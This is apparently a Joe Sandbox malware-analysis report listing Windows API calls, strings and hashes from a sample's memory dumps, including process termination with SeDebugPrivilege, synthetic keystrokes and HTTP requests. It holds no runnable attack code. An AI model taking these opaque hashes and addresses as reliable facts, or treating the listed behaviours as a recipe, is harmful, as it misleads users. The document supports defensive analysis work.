• Opcode ID: 03d83000b69067876cb58c40b123406345da0903b15e5e6032083bc94a71a695
• Instruction ID: 24cec7f6210d0b85faef9136d0c1d1209141d044ac1b7464b64d037286ae4ccf
• Opcode Fuzzy Hash: 03d83000b69067876cb58c40b123406345da0903b15e5e6032083bc94a71a695
• Instruction Fuzzy Hash: 80C16A75A0821A9FDB04DF98D4C1BEEB7F4FF08315F20406AE616E7651C7B5AA81CB90
APIs
• __lock.LIBCMT ref: 0019BA74
  • Part of subcall function 00198984: __mtinitlocknum.LIBCMT ref: 00198996
  • Part of subcall function 00198984: RtlEnterCriticalSection.NTDLL(00190127), ref: 001989AF
• __calloc_crt.LIBCMT ref: 0019BA85
  • Part of subcall function 00197616: __calloc_impl.LIBCMT ref: 00197625
  • Part of subcall function 00197616: Sleep.KERNEL32(00000000,?,00190127,?,0017125D,00000058,?,?), ref: 0019763C
• @_EH4_CallFilterFunc@8.LIBCMT ref: 0019BAA0
• GetStartupInfoW.KERNEL32(?,00226990,00000064,00196B14,002267D8,00000014), ref: 0019BAF9
• __calloc_crt.LIBCMT ref: 0019BB44
• GetFileType.KERNEL32(00000001), ref: 0019BB8B
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0019BBC4
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
• String ID:
• API String ID: 1426640281-0
• Opcode ID: 70e871e294f35c8b4cfd7cb8134143115acdcfd5730c4411c06b58c2bcb553ab
• Instruction ID: 0e2e21bc6c75c0556c465cc70016d24a53bc36a632c7e991959ce0b62f2bc98c
• Opcode Fuzzy Hash: 70e871e294f35c8b4cfd7cb8134143115acdcfd5730c4411c06b58c2bcb553ab
• Instruction Fuzzy Hash: 508102709093558FCF24CF68E9C46ADBBF0AF49324B24826DD4A6AB3D1CB349803CB55
                                                                                                                              APIs
                                                                                                                              • GetClientRect.USER32(?), ref: 001EEC32
                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 001EEC49
                                                                                                                              • GetWindowDC.USER32(?), ref: 001EEC55
                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 001EEC64
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 001EEC76
                                                                                                                              • GetSysColor.USER32(00000005), ref: 001EEC94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 272304278-0
                                                                                                                              • Opcode ID: 318aa2198e3ecf88240739dc4a14851ae0e3170542ff242468f9d2bc2c0265cb
                                                                                                                              • Instruction ID: 42469fbc9477e3107a5015e9ef4bac2cdfdd84be4cc8096d572d283540480a33
                                                                                                                              • Opcode Fuzzy Hash: 318aa2198e3ecf88240739dc4a14851ae0e3170542ff242468f9d2bc2c0265cb
                                                                                                                              • Instruction Fuzzy Hash: 8A214D31504645AFDB21AF74FC48BB97BB6EB05321F104120FA26A50F1CB310A81DF11
                                                                                                                              APIs
                                                                                                                              • EnumChildWindows.USER32(?,001ADD46), ref: 001ADC86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChildEnumWindows
                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                              • API String ID: 3555792229-1603158881
                                                                                                                              • Opcode ID: 7ae60edf4102221b89a2793af9be9852aaf26f210fb2ef3b45145ae476e320da
                                                                                                                              • Instruction ID: 80e3745fba6c8a14e0c44566525969f6d5877af9dcfe042426391a5b79bd1d97
                                                                                                                              • Opcode Fuzzy Hash: 7ae60edf4102221b89a2793af9be9852aaf26f210fb2ef3b45145ae476e320da
                                                                                                                              • Instruction Fuzzy Hash: E691B534A00A06EACB0CEF60E481BEDFB75BF17314F548119D85BA7551DF70AA5ACBA0
                                                                                                                              APIs
                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001745F0
                                                                                                                              • CoUninitialize.COMBASE ref: 00174695
                                                                                                                              • UnregisterHotKey.USER32(?), ref: 001747BD
                                                                                                                              • DestroyWindow.USER32(?), ref: 001E5936
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 001E599D
                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001E59CA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                              • String ID: close all
                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                              • Opcode ID: acc9744a8f1bdad215b0d90bc3d5e4cee23b41132092e676ca01cc0307ad3472
                                                                                                                              • Instruction ID: 1895e225c43afba0ac3bedc538e1855fc2027dc48456d9b4209ed3f33fd3f2e8
                                                                                                                              • Opcode Fuzzy Hash: acc9744a8f1bdad215b0d90bc3d5e4cee23b41132092e676ca01cc0307ad3472
                                                                                                                              • Instruction Fuzzy Hash: DC911D34600602CFC719EF14D895A68F3B5FF25714F5182A9F40AA7262DB30AE66CF10
                                                                                                                              APIs
                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 0018C2D2
                                                                                                                                • Part of subcall function 0018C697: GetClientRect.USER32(?,?), ref: 0018C6C0
                                                                                                                                • Part of subcall function 0018C697: GetWindowRect.USER32(?,?), ref: 0018C701
                                                                                                                                • Part of subcall function 0018C697: ScreenToClient.USER32(?,000000FF), ref: 0018C729
                                                                                                                              • GetDC.USER32 ref: 001EE006
                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001EE019
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 001EE027
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 001EE03C
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 001EE044
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001EE0CF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                              • String ID: U
                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                              • Opcode ID: ffa292fc69c4441783824fd594765a092dd6aea6ba4fcf53a1e38a063fc8cb74
                                                                                                                              • Instruction ID: eb62aa1bf7d8fb520361f6823798abbe6fca59b313185ccb2ffb1d7f03153099
                                                                                                                              • Opcode Fuzzy Hash: ffa292fc69c4441783824fd594765a092dd6aea6ba4fcf53a1e38a063fc8cb74
                                                                                                                              • Instruction Fuzzy Hash: C971DE30600648DFCF25DFA4D884AAE7BB2FF48320F144269FD565A1A2C7318991DFA0
                                                                                                                              APIs
                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001C4C5E
                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001C4C8A
                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 001C4CCC
                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001C4CE1
                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C4CEE
                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001C4D1E
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 001C4D65
                                                                                                                                • Part of subcall function 001C56A9: GetLastError.KERNEL32(?,?,001C4A2B,00000000,00000000,00000001), ref: 001C56BE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1241431887-3916222277
                                                                                                                              • Opcode ID: 4b4b5ace26f2954817b5e7b7a7bed065cd109df3758c6ab792a2e12c7d960eca
                                                                                                                              • Instruction ID: 5aa18cd392a8ace5b7cee162a8fc08cea601dee0bf12116965115f86a53d6e6a
                                                                                                                              • Opcode Fuzzy Hash: 4b4b5ace26f2954817b5e7b7a7bed065cd109df3758c6ab792a2e12c7d960eca
                                                                                                                              • Instruction Fuzzy Hash: FF418EB1505618BFEB12AFA0DC95FFA77ADEF28314F10411AFA019A151D770DD84DBA0
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0020DBF0), ref: 001CBBA1
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0020DBF0), ref: 001CBBD5
                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001CBD33
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 001CBD5D
                                                                                                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 001CBEAD
                                                                                                                              • ProgIDFromCLSID.COMBASE(?,?), ref: 001CBEF7
                                                                                                                              • CoTaskMemFree.COMBASE(?), ref: 001CBF14
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
• String ID:
• API String ID: 793797124-0
APIs
  • Part of subcall function 001749CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00174954), ref: 00174A23
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0018B85B), ref: 0018B926
• KillTimer.USER32(00000000,?,00000000,?,?,?,?,0018B85B,00000000,?,?,0018AF1E,?,?), ref: 0018B9BD
• DestroyAcceleratorTable.USER32(00000000), ref: 001EE775
• DeleteObject.GDI32(00000000), ref: 001EE7EB
Similarity
• API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 2402799130-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001DB204
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001EE9EA
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001EEA0B
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001EEA20
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001EEA3D
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001EEA64
• DestroyCursor.USER32(00000000), ref: 001EEA6F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001EEA8C
• DestroyCursor.USER32(00000000), ref: 001EEA97
Similarity
• API ID: CursorDestroyExtractIconImageLoadMessageSend
• String ID:
• API String ID: 3992029641-0
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,001EE9A0,00000004,00000000,00000000), ref: 0018F737
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,001EE9A0,00000004,00000000,00000000), ref: 0018F77E
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,001EE9A0,00000004,00000000,00000000), ref: 001EEB55
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,001EE9A0,00000004,00000000,00000000), ref: 001EEBC1
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
  • Part of subcall function 001AE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 001AE158
  • Part of subcall function 001AE138: GetCurrentThreadId.KERNEL32 ref: 001AE15F
  • Part of subcall function 001AE138: AttachThreadInput.USER32(00000000,?,001ACD34,?,00000001), ref: 001AE166
• MapVirtualKeyW.USER32(00000025,00000000), ref: 001ACE06
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001ACE23
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 001ACE26
• MapVirtualKeyW.USER32(00000025,00000000), ref: 001ACE2F
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001ACE4D
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001ACE50
• MapVirtualKeyW.USER32(00000025,00000000), ref: 001ACE59
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001ACE70
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 001ACE73
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
  • Part of subcall function 001AA857: CLSIDFromProgID.COMBASE ref: 001AA874
  • Part of subcall function 001AA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 001AA88F
  • Part of subcall function 001AA857: lstrcmpiW.KERNEL32(?,00000000), ref: 001AA89D
  • Part of subcall function 001AA857: CoTaskMemFree.COMBASE(00000000), ref: 001AA8AD
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 001CC6AD
• _memset.LIBCMT ref: 001CC6BA
• _memset.LIBCMT ref: 001CC7D8
• CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 001CC804
• CoTaskMemFree.COMBASE(?), ref: 001CC80F
Strings
• NULL Pointer assignment, xrefs: 001CC85D
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                              • API String ID: 1300414916-2785691316
                                                                                                                              • Opcode ID: bb7a9afe939671c2e9b21ffa7439c363dcf5effdfe62fc52260446e97595d4db
                                                                                                                              • Instruction ID: 387e5478b1bf5b3534a2db97a591e884f9b38e43a68555b41ed0a48208d15840
                                                                                                                              • Opcode Fuzzy Hash: bb7a9afe939671c2e9b21ffa7439c363dcf5effdfe62fc52260446e97595d4db
                                                                                                                              • Instruction Fuzzy Hash: 02913C71D00218ABDB10DFA4DC81FEEBBB9EF19750F20815AF519A7281DB709A45CFA0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 001D1B09
• Process32FirstW.KERNEL32(00000000,?), ref: 001D1B17
• __wsplitpath.LIBCMT ref: 001D1B45
  • Part of subcall function 0019297D: __wsplitpath_helper.LIBCMT ref: 001929BD
• _wcscat.LIBCMT ref: 001D1B5A
• Process32NextW.KERNEL32(00000000,?), ref: 001D1BD0
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 001D1BE2
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID: hE"
• API String ID: 1380811348-3790321966
• Opcode ID: 61097ab4cc8770646e5ca11f699a74a398080941509017e84b89f1a2200d7e57
• Instruction ID: 5069c9a303d5c291a76a4351ca501f46bd8628f638ec94d0ac43bb11be95439b
• Opcode Fuzzy Hash: 61097ab4cc8770646e5ca11f699a74a398080941509017e84b89f1a2200d7e57
• Instruction Fuzzy Hash: B4518072508300AFD720EF24D885EABB7ECEF98754F00491EF58997251EB70EA45CB92
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001D9926
• SendMessageW.USER32(?,00001036,00000000,?), ref: 001D993A
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001D9954
• _wcscat.LIBCMT ref: 001D99AF
• SendMessageW.USER32(?,00001057,00000000,?), ref: 001D99C6
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 001D99F4
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: 9ade4ba141f69d60fb20fcbde64d5ba0a096d8e6cc8c2467b925de05f0a6fb7e
• Instruction ID: 4a0c2634c15477ccaefbd0aa27c0c7f57f01972205a55c4174a1663014cef209
• Opcode Fuzzy Hash: 9ade4ba141f69d60fb20fcbde64d5ba0a096d8e6cc8c2467b925de05f0a6fb7e
• Instruction Fuzzy Hash: 1041AE71A00308AFEF219FA4C885BEE7BA8EF09754F10452BF589E7291D7719D84CB60
APIs
  • Part of subcall function 001B6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001B6F7D
  • Part of subcall function 001B6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 001B6F8D
  • Part of subcall function 001B6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 001B7022
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 001D168B
• GetLastError.KERNEL32 ref: 001D169E
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 001D16CA
• TerminateProcess.KERNEL32(00000000,00000000), ref: 001D1746
• GetLastError.KERNEL32(00000000), ref: 001D1751
• CloseHandle.KERNEL32(00000000), ref: 001D1786
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: ea78998e0f3a4e7430563ff42678ee2592525fc5401b20f96fdfdc1811dcb8a1
• Instruction ID: 689505f6893dc109d9fea39290cbec267b55d69e74e1dbe34b7e9d3e7c4483c6
• Opcode Fuzzy Hash: ea78998e0f3a4e7430563ff42678ee2592525fc5401b20f96fdfdc1811dcb8a1
• Instruction Fuzzy Hash: 2441BB75640201BFDB05EF64D8A5FBDB7A5AF64304F098009F90A9F392EBB49940CB41
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 001B62D6
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 934231c94625c2b24d1a12b2d2e6ebdbdc3d0a6821efeda703c8eb6417e3e016
• Instruction ID: d6422b8f9f677edbccb460ef1870a27c05584d9500d0a28f114182b068a6c0ce
• Opcode Fuzzy Hash: 934231c94625c2b24d1a12b2d2e6ebdbdc3d0a6821efeda703c8eb6417e3e016
• Instruction Fuzzy Hash: 7211E036708353BAFB055F54EC42DFE73AC9F36724B100069F505A66C2FBBC6A404568
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 001B7595
• LoadStringW.USER32(00000000), ref: 001B759C
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001B75B2
• LoadStringW.USER32(00000000), ref: 001B75B9
• _wprintf.LIBCMT ref: 001B75DF
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 001B75FD
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 001B75DA
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
